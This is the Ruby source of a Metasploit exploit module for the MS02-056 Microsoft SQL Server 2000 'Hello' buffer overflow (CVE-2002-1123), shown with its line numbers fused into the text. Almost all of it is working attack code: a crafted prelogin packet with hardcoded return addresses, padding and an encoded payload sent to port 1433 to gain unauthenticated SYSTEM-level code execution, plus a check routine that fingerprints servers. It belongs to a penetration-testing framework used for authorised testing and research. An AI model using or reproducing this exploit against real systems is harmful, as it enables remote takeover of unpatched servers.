Path: blob/master/modules/exploits/windows/mssql/ms02_056_hello.rb
19664 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::Remote::MSSQL910def initialize(info = {})11super(12update_info(13info,14'Name' => 'MS02-056 Microsoft SQL Server Hello Overflow',15'Description' => %q{16By sending malformed data to TCP port 1433, an17unauthenticated remote attacker could overflow a buffer and18possibly execute code on the server with SYSTEM level19privileges. This module should work against any vulnerable20SQL Server 2000 or MSDE install (< SP3).21},22'Author' => [ 'MC' ],23'License' => MSF_LICENSE,24'References' => [25[ 'CVE', '2002-1123'],26[ 'OSVDB', '10132'],27[ 'BID', '5411'],28[ 'MSB', 'MS02-056'],2930],31'Privileged' => true,32'Payload' => {33'Space' => 512,34'BadChars' => "\x00",35'StackAdjustment' => -3500,36},37'Targets' => [38[39'MSSQL 2000 / MSDE <= SP2',40{41'Platform' => 'win',42'Rets' => [0x42b68aba, 0x42d01e50],43},44],45],46'Platform' => 'win',47'DisclosureDate' => '2002-08-05',48'DefaultTarget' => 0,49'Notes' => {50'Reliability' => UNKNOWN_RELIABILITY,51'Stability' => UNKNOWN_STABILITY,52'SideEffects' => UNKNOWN_SIDE_EFFECTS53}54)55)56end5758def check59info = mssql_ping60if (info['ServerName'])61print_status("SQL Server Information:")62info.each_pair { |k, v|63print_status(" #{k + (" " * (15 - k.length))} = #{v}")64}65return Exploit::CheckCode::Detected66end67return Exploit::CheckCode::Safe68end6970def exploit71connect72buf = "\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b" +73"\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02" +74"\x10\x00\x00\x00" +75rand_text_english(528, payload_badchars) +76"\x1B\xA5\xEE\x34" +77rand_text_english(4, payload_badchars) +78[ target['Rets'][0] ].pack('V') +79[ target['Rets'][1], target['Rets'][1] ].pack('VV') +80'3333' +81[ target['Rets'][1], target['Rets'][1] ].pack('VV') +82rand_text_english(88, payload_badchars) +83payload.encoded +84"\x00\x24\x01\x00\x00"8586sock.put(buf)8788handler89disconnect90end91end929394